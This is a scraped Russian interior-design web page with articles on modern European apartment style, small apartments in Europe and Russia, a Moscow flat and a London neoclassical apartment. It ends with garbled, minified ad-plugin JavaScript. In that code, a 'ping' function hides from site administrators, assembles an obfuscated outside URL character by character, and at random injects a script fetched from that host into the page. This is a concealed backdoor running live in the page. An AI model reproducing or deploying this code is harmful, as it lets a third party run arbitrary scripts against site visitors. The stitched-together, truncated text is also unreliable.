4 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Европейский дизайн квартиры

Современный европейский дизайн квартиры: какой он?

Как сделать свой дом по-европейски стильным? Регулярно листая журналы или просматривая любимый ресурс о дизайне интерьеров (не InMyRoom, случайно?), вы наверняка в курсе, какие тенденции сейчас доминируют в Европе. Но мы напомним. Наш эксперт, дизайнер Павел Герасимов, делится главными особенностями современного европейского стиля в дизайне интерьера.

Павел Герасимов – постоянный автор InMyRoom, дизайнер, соруководитель мастерской Geometrium. Занимается дизайном интерьеров в современном стиле из экологически чистых материалов. Считает, что интерьеры должны быть современными, удобными и натуральными, а люди – счастливыми и здоровыми.

1. Функциональность и ничего лишнего

У каждого предмета мебели в современном европейском интерьере есть своя функция и каждое дизайнерское решение продуманно. Например, возьмем ванную комнату или душевую в спальне за стеклянной перегородкой: все логично – после душа вы сразу попадаете в уютную спальню без лишних хождений по коридорам. А остров на кухне, переходящий в барную стойку, дает возможность свободно общаться в процессе готовки вкусного ужина.

2. Натуральные отделочные материалы

В Европе натуральные и экологичные отделочные материалы уже давно тренд. Сама фактура природных материалов становится элементом декора: гладкие поверхности шпонированных панелей с текстурой дерева, пол из массивной доски с живописными сучками, мрамор и другие породы камня с красивым узором и прожилками. Живые материалы в отделке вносят природные нотки в интерьер и не перегружают глаз лишними деталями.

3. Объединение пространства без лишних перегородок

Практически в каждом европейском интерьере общественные зоны объединены. Есть личные пространства – детские, спальни; а есть комнаты, где уединение не так важно. Например, разделять кухню, столовую и гостиную не имеет смысла, если семья проводит много времени за общением. Для современного интерьера выбирают зонирование: диван и кресла обозначают зону отдыха, рабочая поверхность выделяет зону готовки, а стол – центр внимания в обеденной зоне.

4. Светлая цветовая палитра в интерьере

Если вы ходите следовать актуальным тенденциям в дизайне интерьера, делайте выбор в пользу белого цвета. Он не только станет идеальным фоном для экспериментов в отделке и декоре, но и визуально добавит легкость и расширит границы вашей квартиры.

5. Предметы задают тон

В европейских интерьерах встречаются либо проверенные временем вещи от известных дизайнеров, либо самые необходимые предметы лаконичных форм. В простоте ведь и кроется красота и изысканность. Но о функциональности забывать не стоит — показатель полезности не должен быть равен нулю.

6. Контрасты и акценты в интерьере

Правильно расставленные акценты – еще одна черта интерьера в европейском стиле. Необычный диван кричащего цвета, декоративные подушки ярких оттенков, или контрастные светильники из черного металла на фоне белых стен – то, что нужно, чтобы придать интерьеру нужную динамику и живость.

Сейчас читают:

Дизайн-дебаты: чем различаются маленькие квартиры в России и мире

Диктат телевизора как отправная точка дизайна? — Вот так новость

Цена ремонта по цене квартиры — нонсенс
Европейские маленькие квартиры, как правило, лучше обставлены. Среди причин опрошенные нами архитекторы назвали разницу в менталитете — россияне предпочитают вкладывать деньги в дополнительные квадратные метры, а не в дизайнерскую или трансформирующуюся мебель, которая «экономит сантиметры». Наш человек на эти деньги скорее купит более просторную квартиру.

На фото: Квартира в Мадриде с трансформируемой стеной: исчезает кухня, появляется место для «спальни» с откидной кроватью

ЧИТАЙТЕ ТАКЖЕ...
Квартира больше или ремонт лучше: Что выбирать, когда денег мало

На фото: Квартира 13,5 кв.м в Милане. Особенность проектамногофункциональный мебельный комплекс. Нижний ярус занимают кухня и гардероб, над ними расположены кровать и обеденная зона

На фото: Квартира 30 кв.м в Париже. С одной стороны она выходит на улицу Риволи, а с другой — на улицу Де Буль. Здесь нашлось место для каминного портала из натурального камня

«На Западе мы видим множество примеров, когда крошечную квартиру покупают из-за определенного места, вида из окна, известности предыдущих хозяев и других причин, которые в России считаются менее весомыми, — говорит дизайнер Елена Маркина. — Часто площадь европейских «малюток» не превышает 25 кв.м. Мне попадались примеры полноценной квартиры даже на 18 «квадратах». Эти «крошки» любовно обставлены, продуманы до мелочей, напичканы всевозможной техникой и отделаны материалами, превышающими стоимость самой квартиры. У нас такого не встретишь. Но, честно говоря, я и сама предпочту большую площадь, чем меньшую, но в знаменитом доме».

На фото: Студия 22,5 кв.м в Париже. На втором этаже, под которым располагается санузел, устроена спальня

В России временное жилье, в Европе постоянное…
В нашей стране маленькая квартира почти всегда рассматривается как временное жилье — и, следовательно, хозяева делают в ней бюджетный ремонт. По словам специалистов, даже в «полноценных» (по метражу) однокомнатных квартирах редко реализуются сложные дизайнерские решения.

«В старинных европейских городах большинство квартир имеют небольшую площадь, — напоминает дизайнер Дарья Одарюк, — и владельцы не относятся к этой недвижимости как к временной. Поэтому они готовы вкладывать средства в отделочные материалы, мебель, предметы искусства и оплату работы дизайнера. Например, часто выделяют дополнительный этаж для спального места — это довольно дорогостоящее решение».

На фото: Квартира 15 кв.м в Париже, обустроенная для студента. Открытые полки и столешница во всю стену визуально удлиняют комнату. Столешница выполняет функции обеденного и рабочего стола

… или под сдачу
Мини-квартиры в исторических районах европейских городов часто предлагаются в аренду туристам и студентам. То есть на недвижимости предполагается зарабатывать. В этом случае ремонт, скорее всего, окажется бюджетным. Но это не означает, что в интерьере не будет изящных конструктивных решений, встроенной и трансформирующейся мебели. Наоборот — обязательно будут.

Из этого вытекает еще одно различие: европейцы за счет адекватного ремонта повышают капитализацию крошечной квартиры под сдачу, а в России даже «золотой» ремонт такого жилища не поможет повысить цену аренды.

У кого больше опыта
«В Европе не только больше миниатюрных квартир, но и площадь их часто скромнее, чем в наших студиях. В Италии или Франции можно увидеть квартиры по 7-9 кв.м. И в этих малогабаритках европейцы умудряются уместить и кухню, и спальню/гостиную, и даже душ. Конечно, в таком пространстве больше пары недель провести сложно, но многие квартиры на то и рассчитаны», — замечает Ирина Золотова, дизайнер ZZburo. Но мы говорим о недвижимости для сдачи в аренду. Основные квартиры для постоянного проживания редко бывают такими крошечными.

У российских архитекторов опыт работы с маленькими квартирами, прямо скажем, невелик — раньше такие интерьеры обставляли самостоятельно, к дизайнеру не обращались. «Штучные» проекты делали, но массово обращаться в бюро с квартирами площадью 18-30 кв.м начали относительно недавно.

Факт: Дизайнеры часто выполняют интересные проекты малогабариток «для себя» и собственной семьи. И вот там они демонстрируют и возможности эргономики, и чудеса продуманной планировки пространства. Но, если разобраться, то в таких интерьерах «цена проектирования» (при бюджетных решениях) оказывается довольно высока.

Вынужденное уважение к истории
У европейских архитекторов, с одной стороны, есть богатый опыт обустройства маленьких квартир. С другой стороны, — множество ограничений по сравнению с российскими проектами.

«Западные квартиры часто нельзя масштабно реконструировать, — рассказывает Степан Бугаев, арт-директор студии «Точка дизайна». — Это касается полов, окон, балконов, радиаторов. В Европе более заботливо относятся к старой архитектуре, чем в России. Это наше счастье и несчастье — то, что мы можем, к примеру, остеклить свой балкон, чего в Европе не позволят, чтобы не испортить облик города».
Европейцы стремятся сохранять исторические элементы и внутри помещения — камины, лепнину, паркет, окна и т. п. В российских квартирах маленького метража элементы старины встречаются редко.

«Когда к нам приходит заказчик со сталинкой, в которой остались элементы лепнины или есть поддающийся восстановлению паркет, то мы радуемся, — комментирует Иван Проскурин, архитектор SPACE FOR LIFE. — Это означает, что у нас получится сделать не «новодельный» интерьер, а живой, изначально уютный — в отличии от квартир в новостройках». Однако, помимо исходных данных квартиры, возникает не менее важный вопрос — хватит ли средств на бережную реконструкцию старого фонда?

Маленькая квартира в европейском стиле

Проект дизайнеров студии Artup Bureau

Клиенты Artup Bureau, поклонники сдержанного европейского стиля, много путешествуют по Италии и Бельгии. Их увлечения отразились на интерьере московской квартиры.

Отличительная черта многих заказчиков, по наблюдениям архитекторов студии Artup Bureau, — пагубная страсть к накопительству. «После чего весь этот скарб необходимо где-то складировать, — рассказывает автор проекта Янина Затолокина. — Это, пожалуй, первые наши клиенты, которым не были нужны все эти комоды, шкафы.

Они отказались даже от телевизора, чем сразу же нас подкупили». Хозяева квартиры — молодая семейная пара — постоянно находятся в движении и предпочитают сильно не привязываться к вещам.

В свободное от работы время (муж занимается недвижимостью, жена — топ-менеджер крупной консалтинговой компании) супруги много путешествуют по Европе.

«Увлечения отразились на вкусах, — рассказывает соавтор Янины Анастасия Извольская. — Подобно европейцам, они предпочитают качество количеству, выбирая более функциональные предметы». По замыслу дизайнеров квартира должна была стать местом, где хозяева наконец смогут ненадолго замедлить темп и отдохнуть.

Поэтому они выбрали для нее минималистский стиль, характерный для горячо любимых заказчиками бельгийских домов. На площади 68 кв. м разместились три основных помещения — спальня, гостиная, совмещенная с кабинетом, и кухня.

Чтобы визуально разгрузить пространство, часть мебели покрасили точно в цвет стен, таким образом сделав ее почти невидимой. При этом в отделке комбинировали декоративную штукатурку с краской более темного оттенка — это еще один прием, благодаря которому комнаты стали казаться просторнее.

«Сложнее всего нам пришлось с кухней, — рассказывает Янина. — Шла борьба за каждый миллиметр. Например, чтобы вписать холодильник в нишу около двери, пришлось даже разбирать стояк и собирать его заново из более тонкого кирпича».

Шкафы для посуды и винный холодильник встроены в кухонный остров. «В таких чистых пространствах особенно важны детали.

Много времени мы посвятили выбору живописи и остановились на работах Натты Мельниковой, — говорит Анастасия. — Ей 90 лет, но она продолжает писать.

Сюжет ее картин символичен — Брюгге, любимый город заказчиков. Теперь они смогут возвращаться туда вновь и вновь, не выходя из дома». www.artup.pro

Хёрст Шкулёв Паблишинг

Москва, ул. Шаболовка, дом 31б, 6-й подъезд (вход с Конного переулка)

Какие интерьеры предпочитают бизнесмены Европы

Главная / Советы и идеи / Дизайн и Декор / Какие интерьеры предпочитают бизнесмены Европы

Александрова Ольга Mon, 15 Apr 2019 08:00:40 +0300

Знаменитый голографический портрет Елизаветы II с закрытыми глазами, сделанный во время паузы в официальной фотосессии художником Крисом Левайном (Chris Levine, Lightness of Being), так и называется — «Лёгкость бытия». В своё время изображение доставило немало неприятностей королевской пресс-службе, а сейчас определяет стиль и дух одного из самых модных лондонских интерьеров. Элегантная неоклассика с фирменной английской иронией и итальянской душой.

Хозяева апартаментов — София и Николо Бараттьери ди Сан Пьетро (Sofia and Niccolo Barattieri di San Pietro) — люди, на вечеринки к которым ходят после приёмов в Букингемском дворце. Николо — управляющий директор Northacre, ведущего английского девелопера класса люкс, увлечённый яхтсмен и любитель футбола.

Среди его клиентов — половина британской аристократии, арабские шейхи и русские миллиардеры. Его жена София — хозяйка динамичного стартапа в индустрии высокой моды. Оба выросли в Италии, разделяют любовь к Средиземному морю и историческим палаццо, но жить предпочитают в космополитичном Лондоне.

София Бараттьери, владелица:

— Как и все жители Британских островов, мы разделяем потребность и в чувстве меры, и в разнообразии. Но как итальянцы мы любим тот вид роскоши, который позволяет скинуть туфли и расслабиться. Для этого нам был нужен человек, способный привнести элемент светской игривости. И мы нашли Паоло Москино. Он великолепно оформил дома большинства наших знакомых. Он понимает нас. И у него безупречный вкус.

Паоло Москино, арт-директор Nicholas Haslam Ltd:

Паоло Москино (Paolo Moschino), арт-директор и совладелец Nicholas Haslam Ltd., преданный ученик и протеже гуру британского дизайна Ника Хэслема, выходец из знаменитой семьи Москино. Со временем Паоло стал совладельцем фирмы, специализирующейся на декоре интерьеров, в составе разросшейся дизайнерской компании учителя. К его услугам прибегают состоятельные аристократы, миллиардеры со вкусом и голливудские звёзды. Это Москино оформлял дом в графстве Суррей, где держали под домашним арестом чилийского диктатора Пиночета. Позже поместье приобрёл банкир Пётр Авен, и английские газеты несколько месяцев смаковали подробности: самый большой атриум в Европе, подземный бункер с русским искусством и камин стоимостью 165 тысяч фунтов. Москино предпочитает работать в неоклассическом стиле и ар-деко, хотя причислять себя к поклонникам этих направлений не любит. «Правильный» английский интерьер, мастером которого он считается, предполагает смешение лучшего, что случилось на просторах империи, а значит к конкретному стилю отнесён быть не может. «Я уже много лет могу позволить себе выбирать клиентов, — говорит Москино. — Поэтому работаю только на единомышленников. Именно так получается наилучший результат. Теперь почти все мои клиенты — мои близкие друзья, для которых я создаю интерьеры не на минуту, а навсегда».

Но для этого проекта одного только хорошего вкуса было мало. Требовалась серьёзная инженерная работа. И её доверили архитектурному бюро Tyler Mandic. До переоформления Бараттьери жили в дуплексе с видом на знаменитые сады в центре Кенсингтона — исторического и престижнейшего района Лондона, расположенного между Ноттинг-хиллом, Челси и Белгравией. Когда у пары родился третий ребёнок, места стало отчаянно не хватать, и супруги купили апартаменты по-соседству, что утроило метраж. Теперь Бараттьери принадлежало два этажа в смежных викторианских домах. Вопрос был только в том, чтобы объединить строения. Чтобы решить эту задачу, не разрушив элитную историческую недвижимость и не нарушив закон, архитекторы придумали сложнейший проект.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика